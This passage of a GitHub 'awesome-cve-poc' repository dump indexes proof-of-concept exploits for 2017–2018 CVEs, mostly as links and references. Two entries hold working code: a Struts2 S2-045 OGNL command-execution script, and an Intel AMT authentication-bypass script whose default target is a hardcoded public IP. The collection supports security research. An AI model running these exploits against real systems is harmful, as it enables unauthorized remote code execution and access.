├── .github
    └── FUNDING.yml
├── .gitignore
├── .vscode
    └── settings.json
├── CONTRIBUTING.md
├── CVE-2017-0070.md
├── CVE-2017-0199.md
├── CVE-2017-0290.md
├── CVE-2017-0781.md
├── CVE-2017-1000353.md
├── CVE-2017-10271.md
├── CVE-2017-12611.md
├── CVE-2017-16995.md
├── CVE-2017-5116.md
├── CVE-2017-5123.md
├── CVE-2017-5638.md
├── CVE-2017-5689.md
├── CVE-2017-5715.md
├── CVE-2017-5753.md
├── CVE-2017-5754.md
├── CVE-2017-7293.md
├── CVE-2017-7494.md
├── CVE-2017-8464.md
├── CVE-2017-9791.md
├── CVE-2017-9805.md
├── CVE-2017-9993.md
├── CVE-2018-0492.md
├── CVE-2018-0886.md
├── CVE-2018-10933.md
├── CVE-2018-11235.md
├── CVE-2018-11776.md
├── CVE-2018-4878.md
├── CVE-2018-7600.md
├── CVE-2018-8174.md
├── MS17-010.md
├── README.md
├── Stack-Clash.md
└── code-of-conduct.md

/.github/FUNDING.yml:
--------------------------------------------------------------------------------
github: [qazbnm456]
patreon: boik
custom: https://medium.com/@qazbnm456
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
.DS_store
--------------------------------------------------------------------------------
/.vscode/settings.json:
--------------------------------------------------------------------------------
{
  "markdownlint.config": {
    "default": true,
    "MD033": { "allowed_elements": ["b", "br", "p", "img"] },
    "MD034": false,
    "MD037": false
  }
}
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
Appreciate and recognize [all contributors](https://github.com/qazbnm456/awesome-cve-poc/graphs/contributors).

Please note that this project is released with a [Contributor Code of Conduct](https://github.com/qazbnm456/awesome-cve-poc/blob/master/code-of-conduct.md).
By participating in this project you agree to abide by its terms.

# Table of Contents

- [Awesome CVE PoC contribution guidelines](#contribution-guidelines)
- [Quality Standard](#quality-standard)
- [Adding to this list](#adding-to-this-list)
- [Adding something to an awesome list](#adding-something-to-an-awesome-list)
- [Updating your Pull Request](#updating-your-pull-request)

# Contribution Guidelines

(your commit message will be a tweet, keep that in mind :)

- **To add to the list:** Submit a pull request
- **To remove from the list:** Submit a pull request
- want to change something: Submit a pull request
- want to try something else: Submit a pull request
- don't know what to do: Submit a pull request or open an issue, let us know what's going on.

`awesome-cve-poc` is a collection of Proofs of Concept for Common Vulnerabilities and Exposures. It would be nice if your entry fits the existing CVE PoC format in some way, but if it's awesome, let us know why and you're on!

- Each item should be limited to one link, no duplicates, no redirection (careful with `http` vs `https`!)
- The link text should be the name of the PoC
- The description should be the same as the CVE entry
- If you want to add more than one link, please don't put all of them on the exact same line in one PR; that usually results in conflicts and your PR cannot be automatically merged.

Please contribute links to slides/projects you have used or are familiar with. This will help ensure high-quality entries.

# Quality standard

Note that we can help you achieve those standards, just try your best, be brave.
We'll guide you to the best of our abilities.

To be on the list, it would be *nice* if entries adhere to these quality standards:

- Generally useful to the community
- Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person.
- Solves a real problem (even a small one)
- If it is a **WIP** (work in progress, not safe for production), mention it.

If your PR is not merged, we will tell you why so that you may be able to improve it.

# Awesome Related Contribution Guidelines

## Adding to this list

Please ensure your pull request adheres to the following guidelines:

- Search previous suggestions before making a new one, as yours may be a duplicate.
- Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description.
- Make an individual pull request for each suggestion.
- Use [title-casing](http://titlecapitalization.com) (AP style).
- Use the following format: `[List Name](link)`
- Link additions should be added to the bottom of the relevant category.
- New categories or improvements to the existing categorization are welcome.
- Check your spelling and grammar.
- Make sure your text editor is set to remove trailing whitespace.
- The pull request and commit should have a useful title.
- The body of your commit message should contain a link to the repository.

Thank you for your suggestions!

## Adding something to an awesome list

If you have something awesome to contribute to an awesome list, this is how you do it.

You'll need a [GitHub account](https://github.com/join)!

1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome
2. Click on the `readme.md` file: ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png)
3. Now click on the edit icon. ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png)
4. You can start editing the text of the file in the in-browser editor. Make sure you follow the guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png)
5. Say why you're proposing the changes, and then click on "Propose file change". ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png)
6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)!

## Updating your Pull Request

Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines.

[Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write-up on how to change a Pull Request, and the different ways you can do that.
--------------------------------------------------------------------------------
/CVE-2017-0070.md:
--------------------------------------------------------------------------------
# CVE-2017-0070

- Report: March 14, 2017
- Credit: Lokihart of Google Project Zero

## PoC

```html
```

## Reference

- [Microsoft Edge: Undefined behavior on some getters](https://bugs.chromium.org/p/project-zero/issues/detail?id=1043)
--------------------------------------------------------------------------------
/CVE-2017-0199.md:
--------------------------------------------------------------------------------
# CVE-2017-0199

- Report: Apr 2017
- Credit: FireEye

## PoC

- [SyFi/cve-2017-0199](https://github.com/SyFi/cve-2017-0199) - Sample file used in the wild.
- [bhdresh/CVE-2017-0199](https://github.com/bhdresh/CVE-2017-0199) - Exploit toolkit CVE-2017-0199.
- [nixawk/labs](https://github.com/nixawk/labs/tree/master/CVE-2017-0199)

## Reference

- [Analysis of a CVE-2017-0199 Malicious RTF Document](https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/)
- [Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)
- [CVE-2017-0199](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199)
--------------------------------------------------------------------------------
/CVE-2017-0290.md:
--------------------------------------------------------------------------------
# CVE-2017-0290

- Report: May 2017
- Credit: Tavis Ormandy of Google Project Zero

## PoC

- [https://bugs.chromium.org/p/project-zero/issues/attachment?aid=283405](https://bugs.chromium.org/p/project-zero/issues/attachment?aid=283405)

## Reference

- [MsMpEng: Remotely Exploitable Type Confusion in Windows 8, 8.1, 10, Windows Server, SCEP, Microsoft Security Essentials, and more.](https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5)
- [Microsoft Security Advisory 4022344 - Security Update for Microsoft Malware Protection Engine](https://technet.microsoft.com/en-us/library/security/4022344)
- [Vulnerability Alert | Serious Remote Code Execution Vulnerability Exposed in the Windows Malware Protection Engine (CVE-2017-0290)](http://www.freebuf.com/vuls/134172.html)
--------------------------------------------------------------------------------
/CVE-2017-0781.md:
--------------------------------------------------------------------------------
# CVE-2017-0781

- Report: Apr 2017
- Credit: Armis Labs

## PoC

- [ArmisSecurity/blueborne](https://github.com/ArmisSecurity/blueborne) - PoC scripts demonstrating the BlueBorne vulnerabilities
- [BlueBorne RCE on Android 6.0.1 (CVE-2017-0781) [English]](https://jesux.es/exploiting/blueborne-android-6.0.1-english/)

## Reference

- [BlueBorne on Android - Exploiting an RCE Over the Air](https://go.armis.com/hubfs/BlueBorne%20-%20Android%20Exploit.pdf)
- [The Attack Vector “BlueBorne” Exposes Almost Every Connected Device](https://www.armis.com/blueborne/)
--------------------------------------------------------------------------------
/CVE-2017-1000353.md:
--------------------------------------------------------------------------------
# CVE-2017-1000353

- Report: Apr 26, 2017
- Credit: An independent security researcher

## PoC

- [nixawk/labs](https://github.com/nixawk/labs/tree/master/CVE-2017-1000353)
- [phith0n/vulhub](https://github.com/phith0n/vulhub/tree/master/jenkins/CVE-2017-1000353)

## Reference

- [Jenkins Security Advisory 2017-04-26](https://jenkins.io/security/advisory/2017-04-26/)
- [Jenkins Java Deserialization CVE-2017-1000353 Remote Code Execution Vulnerability](http://www.securityfocus.com/bid/98056)
--------------------------------------------------------------------------------
/CVE-2017-10271.md:
--------------------------------------------------------------------------------
# CVE-2017-10271

- Report: Oct 2017
- Credit: Alexey Tyurin of ERPScan and Federico Dotta of Media Service

## PoC

- [kkirsche/CVE-2017-10271](https://github.com/kkirsche/CVE-2017-10271)
- [Luffin/CVE-2017-10271](https://github.com/Luffin/CVE-2017-10271)

## Reference

- [CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining](https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html)
- [WebLogic XMLDecoder RCE Analysis](http://xxlegend.com/2017/12/23/Weblogic%20XMLDecoder%20RCE%E5%88%86%E6%9E%90/)
- [Oracle WebLogic Exploit Used in Cryptocurrency Mining Campaign](https://www.darkreading.com/vulnerabilities---threats/oracle-weblogic-exploit-used-in-cryptocurrency-mining-campaign/d/d-id/1330791)
- [CVE-2017-10271](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271)
--------------------------------------------------------------------------------
/CVE-2017-12611.md:
--------------------------------------------------------------------------------
# CVE-2017-12611, which is also known as S2-053

- Report: Aug 2017
- Credit: Lupin from [jd.com](jd.com) security team, David Greene, and Roland McIntosh

## PoC

- [S2-053 Reproduction and Analysis (with PoC)](https://paper.tuisec.win/detail-0649dd1c013f593.html)
- [Medicean/VulApps](https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-053)

## Reference

- [S2-053](https://cwiki.apache.org/confluence/display/WW/S2-053)
- [CVE-2017-12611](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12611)
--------------------------------------------------------------------------------
/CVE-2017-16995.md:
--------------------------------------------------------------------------------
# CVE-2017-16995

- Report: Dec 4, 2017
- Credit: Jann Horn (Google Project Zero)

## PoC

- [A Small Lever Moves a Great Weight: Ubuntu Kernel eBPF 0day Analysis](https://security.tencent.com/index.php/blog/msg/124)
- [iBearcat/CVE-2017-16995](https://github.com/iBearcat/CVE-2017-16995)
- [Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation](https://www.exploit-db.com/exploits/44298/)

## Reference

- [arbitrary read+write via incorrect range tracking in eBPF](https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3)
- [CVE-2017-16995](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995)
--------------------------------------------------------------------------------
/CVE-2017-5116.md:
--------------------------------------------------------------------------------
# CVE-2017-5116

- Report: Aug 2017
- Fix: Aug 2017
- Credit: Guang Gong of Alpha Team, Qihoo 360

## PoC

```html
poc
```

## Reference

- [Android Security Ecosystem Investments Pay Dividends for Pixel](https://android-developers.googleblog.com/2018/01/android-security-ecosystem-investments.html)
- [Issue](https://crbug.com/759624)
- [CVE-2017-5116](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5116)
--------------------------------------------------------------------------------
/CVE-2017-5123.md:
--------------------------------------------------------------------------------
# CVE-2017-5123

- Report: October, 2017
- Credit: Chris Salls

## PoC

- [nongiach/CVE](https://github.com/nongiach/CVE/tree/master/CVE-2017-5123)

## Reference

- [Escaping Docker container using waitid() – CVE-2017-5123](https://www.twistlock.com/2017/12/27/escaping-docker-container-using-waitid-cve-2017-5123/)
- [Exploiting CVE-2017-5123](https://reverse.put.as/2017/11/07/exploiting-cve-2017-5123/)
- [CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok()](http://seclists.org/oss-sec/2017/q4/78)
- [CVE-2017-5123](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123)
--------------------------------------------------------------------------------
/CVE-2017-5638.md:
--------------------------------------------------------------------------------
# CVE-2017-5638, which is also known as S2-045

- Report: Jan 2017
- Credit: Nike Zheng

## PoC

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py ")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
```

## Reference

- [Vulnerability Alert: Apache Struts2 Arbitrary Code Execution Vulnerability Exposed (S2-045, CVE-2017-5638)](http://www.freebuf.com/vuls/128668.html)
- [Preliminary Analysis of the S2-045 Mechanism (CVE-2017-5638)](http://paper.seebug.org/241/)
- [CVE-2017-5638](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)
- [An Analysis Of CVE-2017-5638](https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html)
- [Worried about Strutshock (CVE-2017-5638)?](https://www.tinfoilsecurity.com/strutshock)
65 | - [CWE-2017-5638](http://www.ninoishere.com/cwe-2017-5638/) 66 | -------------------------------------------------------------------------------- /CVE-2017-5689.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5689 2 | 3 | - Report: March 2017 4 | - Credit: Maksim Malyutin from Embedi 5 | 6 | ## PoC 7 | 8 | ```python 9 | #!/usr/bin/env python 10 | import requests 11 | import sys 12 | 13 | if len(sys.argv) > 1: 14 | ip = str(sys.argv[1]) 15 | else: 16 | ip = '168.235.84.117' 17 | 18 | url = 'http://'+ip+':16992/index.htm' 19 | req = requests.get(url) 20 | auth = req.headers['WWW-Authenticate'] 21 | words = auth.split('"') 22 | headers = 'Digest username= "admin", realm="'+words[1]+'", nonce="'+words[3]+'", uri="index.htm", response="", qop="auth", nc="00000001", cnonce="8858482c60513ab5" ' 23 | poc = requests.get(url, headers={'Authorization': headers}) 24 | if poc.status_code == 200: 25 | print('Success') 26 | else: 27 | print('Failed') 28 | ``` 29 | 30 | ## Reference 31 | 32 | - [Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability](http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-cve-2017-5689-intel-management-engine-vulnerability/) 33 | - [Explained — How Intel AMT Vulnerability Allows to Hack Computers Remotely](http://thehackernews.com/2017/05/intel-amt-vulnerability.html) 34 | - [http-vuln-cve2017-5689 NSE Script](https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5689.html) 35 | - [simple python poc for CVE-2017-5689](https://github.com/kd0kkv/intel_amt_bypass) 36 | - [CVE-2017-5689](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689) 37 | -------------------------------------------------------------------------------- /CVE-2017-5715.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5715 (branch target injection) 2 | 3 | - Report: Jun 1, 2017 4 | - Credit: Jann Horn (Google Project Zero) and Paul Kocher in 
collaboration with, in alphabetical order, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval Yarom (University of Adelaide and Data61) 5 | 6 | ## PoC 7 | 8 | - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715) 9 | - [HarsaroopDhillon/SpectreExploit](https://github.com/HarsaroopDhillon/SpectreExploit) - SpectreExploit POC 10 | 11 | ## Reference 12 | 13 | - [Spectre](https://spectreattack.com/spectre.pdf) 14 | - [Reading privileged memory with a side-channel](https://googleprojectzero.blogspot.tw/2018/01/reading-privileged-memory-with-side.html) 15 | - [marcan/speculation-bugs](https://github.com/marcan/speculation-bugs) 16 | - [A Simple Explanation of the Differences Between Meltdown and Spectre](https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/) 17 | - [Intel: Intel Responds to Security Research Findings](https://newsroom.intel.com/news/intel-responds-to-security-research-findings/) 18 | - [Negative Result: Reading Kernel Memory From User Mode](https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/) 19 | - [History stealing using timing attack](http://antoinevastel.github.io/security/privacy/2017/04/09/history-stealing.html) 20 | - [CVE-2017-5715](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715) 21 | -------------------------------------------------------------------------------- /CVE-2017-5753.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5753 (bounds check bypass) 2 | 3 | - Report: Jun 1, 2017 4 | - Credit: Jann Horn (Google Project Zero) and Paul Kocher in collaboration with, in alphabetical order, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval 
Yarom (University of Adelaide and Data61) 5 | 6 | ## PoC 7 | 8 | - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715) 9 | - [HarsaroopDhillon/SpectreExploit](https://github.com/HarsaroopDhillon/SpectreExploit) - SpectreExploit POC 10 | - [V-E-O/PoC](https://github.com/V-E-O/PoC/tree/master/CVE-2017-5753) - Spectre CVE-2017-5753 PoC for Android/Linux/ARM64 11 | 12 | ## Reference 13 | 14 | - [Spectre](https://spectreattack.com/spectre.pdf) 15 | - [Reading privileged memory with a side-channel](https://googleprojectzero.blogspot.tw/2018/01/reading-privileged-memory-with-side.html) 16 | - [marcan/speculation-bugs](https://github.com/marcan/speculation-bugs) 17 | - [A Simple Explanation of the Differences Between Meltdown and Spectre](https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/) 18 | - [Intel: Intel Responds to Security Research Findings](https://newsroom.intel.com/news/intel-responds-to-security-research-findings/) 19 | - [Negative Result: Reading Kernel Memory From User Mode](https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/) 20 | - [History stealing using timing attack](http://antoinevastel.github.io/security/privacy/2017/04/09/history-stealing.html) 21 | - [CVE-2017-5753](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753) 22 | -------------------------------------------------------------------------------- /CVE-2017-5754.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5754 (rogue data cache load) 2 | 3 | - Report: Jun 1, 2017 4 | - Credit: Jann Horn (Google Project Zero), Werner Haas, Thomas Prescher @ Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz @ Graz University of Technology 5 | 6 | ## PoC 7 | 8 | - [IAIK/meltdown](https://github.com/IAIK/meltdown) 9 | - 
[CacheAttack.cpp](https://pastebin.com/CF91uGTG) 10 | - [paboldin/meltdown-exploit](https://github.com/paboldin/meltdown-exploit) 11 | - [raphaelsc/Am-I-affected-by-Meltdown](https://github.com/raphaelsc/Am-I-affected-by-Meltdown) 12 | - [lgeek/spec_poc_arm](https://github.com/lgeek/spec_poc_arm) 13 | - [GitMirar/meltdown-poc](https://github.com/GitMirar/meltdown-poc) 14 | 15 | ## Reference 16 | 17 | - [Meltdown](https://meltdownattack.com/meltdown.pdf) 18 | - [Time-travelling exploits with Meltdown](https://medium.com/@pwnallthethings/time-travelling-exploits-with-meltdown-1189548f1e1d) 19 | - [Reading privileged memory with a side-channel](https://googleprojectzero.blogspot.tw/2018/01/reading-privileged-memory-with-side.html) 20 | - [marcan/speculation-bugs](https://github.com/marcan/speculation-bugs) 21 | - [A Simple Explanation of the Differences Between Meltdown and Spectre](https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/) 22 | - [Intel: Intel Responds to Security Research Findings](https://newsroom.intel.com/news/intel-responds-to-security-research-findings/) 23 | - [Negative Result: Reading Kernel Memory From User Mode](https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/) 24 | - [History stealing using timing attack](http://antoinevastel.github.io/security/privacy/2017/04/09/history-stealing.html) 25 | - [CVE-2017-5754](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754) 26 | -------------------------------------------------------------------------------- /CVE-2017-7293.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-7293 2 | 3 | - Report: Jan 2017 4 | - Credit: Forshaw of Google Project Zero 5 | 6 | ## PoC 7 | 8 | - [tyranid/ExploitDotNetDCOM](https://github.com/tyranid/ExploitDotNetDCOM) 9 | 10 | ## Reference 11 | 12 | - [Windows: Dolby Audio X2 Service EoP](https://bugs.chromium.org/p/project-zero/issues/detail?id=1075) 13 | - 
[More Details About CVE-2014-4073 Elevation of Privilege Vulnerability](https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/) 14 | -------------------------------------------------------------------------------- /CVE-2017-7494.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-7494 2 | 3 | - Report: May 2017 4 | - Credit: steelo \ 5 | 6 | ## PoC 7 | 8 | - [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb) 9 | - [Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)](https://github.com/omri9741/cve-2017-7494) 10 | - [Samba 3.5.0 - Remote Code Execution](https://www.exploit-db.com/exploits/42060/) 11 | - [Adding sambaPipe example](https://github.com/CoreSecurity/impacket/commit/32e71ef2369b10d8eaf2cf5a909252727e21f82d) 12 | 13 | ## Reference 14 | 15 | - [Samba远程代码执行漏洞(CVE-2017-7494)分析](http://blogs.360.cn/blog/samba远程代码执行漏洞cve-2017-7494分析/) 16 | - [Patching CVE-2017-7494 in Samba: It’s the Circle of Life](https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life) 17 | - [Samba - Security Announcement Archive: CVE-2017-7494.html](https://www.samba.org/samba/security/CVE-2017-7494.html) 18 | -------------------------------------------------------------------------------- /CVE-2017-8464.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-8464 2 | 3 | - Report: Jun 2017 4 | - Credit: Microsoft 5 | 6 | ## PoC 7 | 8 | - [nixawk/labs](https://github.com/nixawk/labs/tree/master/CVE-2017-8464) 9 | 10 | ## Reference 11 | 12 | - [“震网三代”CVE-2017-8464漏洞分析和预警](http://www.freebuf.com/news/143353.html) 13 | -------------------------------------------------------------------------------- /CVE-2017-9791.md: 
-------------------------------------------------------------------------------- 1 | # CVE-2017-9791, which is also known as S2-048 2 | 3 | - Report: Jun 2017 4 | - Credit: icez \ from Tophant Competence Center 5 | 6 | ## PoC 7 | 8 | - [dragoneeg/Struts2-048](https://github.com/dragoneeg/Struts2-048) 9 | - [nixawk/labs](https://github.com/nixawk/labs/blob/master/CVE-2017-9791/exploit_S2-048.py) 10 | 11 | ## Reference 12 | 13 | - [S2-048](https://struts.apache.org/docs/s2-048.html) 14 | - [Examining CVE-2017-9791: New Apache Struts Remote Code Execution Vulnerability](http://blog.trendmicro.com/trendlabs-security-intelligence/examining-cve-2017-9791-new-apache-struts-remote-code-execution-vulnerability/?utm_campaign=shareaholic&utm_medium=facebook&utm_source=socialnetwork) 15 | - [[Tutorial] CVE-2017-9791: Apache Struts2 (S2-048) remote code execution vulnerability](https://securityonline.info/tutorial-cve-2017-9791-apache-struts2-s2-048-remote-code-execution-vulnerability/) 16 | - [CVE-2017-9791](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791) 17 | -------------------------------------------------------------------------------- /CVE-2017-9805.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-9805, which is also known as S2-052 2 | 3 | - Report: July 2017 4 | - Credit: Man Yue Mo \ from [lgtm.com](https://lgtm.com/) / Semmle 5 | 6 | ## PoC 7 | 8 | - [https://hastebin.com/juvanuziji.http](https://hastebin.com/juvanuziji.http) - Originated from [http://blog.csdn.net/caiqiiqi/article/details/77861477](http://blog.csdn.net/caiqiiqi/article/details/77861477) 9 | - [jas502n/St2-052](https://github.com/jas502n/St2-052) 10 | - [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/blob/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb) 11 | - [Medicean/VulApps](https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-052) 12 | 13 | ## 
Reference 14 | 15 | - [S2-052](https://cwiki.apache.org/confluence/display/WW/S2-052) 16 | - [Using QL to find a remote code execution vulnerability in Apache Struts (CVE-2017-9805)](https://lgtm.com/blog/apache_struts_CVE-2017-9805) 17 | - [st052复线漏洞复现过程](https://www.77169.com/html/174708.html) 18 | - [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805) 19 | -------------------------------------------------------------------------------- /CVE-2017-9993.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-9993 2 | 3 | - Report: Jun 2017 4 | - Credit: [Corben Douglas](https://hackerone.com/cdl)(@sxcurity) 5 | 6 | ## PoC 7 | 8 | - [Local File Disclosure via ffmpeg](https://hackerone.com/reports/242831) 9 | 10 | ## Reference 11 | 12 | - [Local File Disclosure via ffmpeg](https://hackerone.com/reports/242831) 13 | - [漏洞预警 | FFmpeg曝任意文件读取漏洞](http://www.freebuf.com/vuls/138377.html) 14 | - [FFmpeg 安全问题讨论](http://paper.seebug.org/338/) 15 | - [avformat/avidec: Limit formats in gab2 to srt and ass/ssa](https://github.com/FFmpeg/FFmpeg/commit/a5d849b149ca67ced2d271dc84db0bc95a548abb) 16 | - [avformat/hls: Check local file extensions](https://github.com/FFmpeg/FFmpeg/commit/189ff4219644532bdfa7bab28dfedaee4d6d4021) 17 | - [CVE-2017-9993](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9993) 18 | -------------------------------------------------------------------------------- /CVE-2018-0492.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-0492 2 | 3 | - Report: Apr 2 2018 4 | - Credit: [Jasper Mattsson](https://www.drupal.org/u/Jasu_M) 5 | 6 | ## PoC 7 | 8 | - [fkt/race.c](https://gist.github.com/fkt/5f8f9560ef54e11ff7df8bec09dc8f9a) 9 | 10 | ## Reference 11 | 12 | - [HoleyBeep: Explanations and exploit](https://sigint.sh/#/holeybeep) 13 | - [johnath/beep#11](https://github.com/johnath/beep/issues/11) 14 | - [Hacker 
News](https://news.ycombinator.com/item?id=16762794) 15 | - [Debian Security Advisory](https://www.debian.org/security/2018/dsa-4163) 16 | - [CVE-2018-0492](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0492) 17 | -------------------------------------------------------------------------------- /CVE-2018-0886.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-0886 2 | 3 | - Report: March 2018 4 | - Credit: Eyal Karni, Yaron Zinar, and Roman Blachman @ [Preempt, Research Labs](https://www.preempt.com/) 5 | 6 | ## PoC 7 | 8 | - [preempt/credssp](https://github.com/preempt/credssp) 9 | 10 | ## Reference 11 | 12 | - [From Public Key to Exploitation: How We Exploited the Authentication in MS-RDP](https://blog.preempt.com/how-we-exploited-the-authentication-in-ms-rdp) 13 | - [CVE-2018-0886](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0886) 14 | -------------------------------------------------------------------------------- /CVE-2018-10933.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-10933 2 | 3 | - Report: Oct, 2018 4 | - Credit: Peter Winter-Smith (@peterwintrsmith) 5 | 6 | ## PoC 7 | 8 | - [hackerhouse-opensource/cve-2018-10933](https://github.com/hackerhouse-opensource/cve-2018-10933) 9 | - [mlosapio/CVE-2018-10933-test](https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7) 10 | 11 | ## Reference 12 | 13 | - [libSSH 认证绕过漏洞(CVE-2018-10933)分析](https://paper.seebug.org/720/) 14 | - [libssh CVE-2018-10933 身份验证绕过漏洞分析报告](https://www.anquanke.com/post/id/162225) 15 | - [Authentication bypass in server code](https://www.libssh.org/security/advisories/CVE-2018-10933.txt) 16 | - [@svblxyz](https://twitter.com/svblxyz/status/1052241153737678849) 17 | -------------------------------------------------------------------------------- /CVE-2018-11235.md: -------------------------------------------------------------------------------- 1 | # 
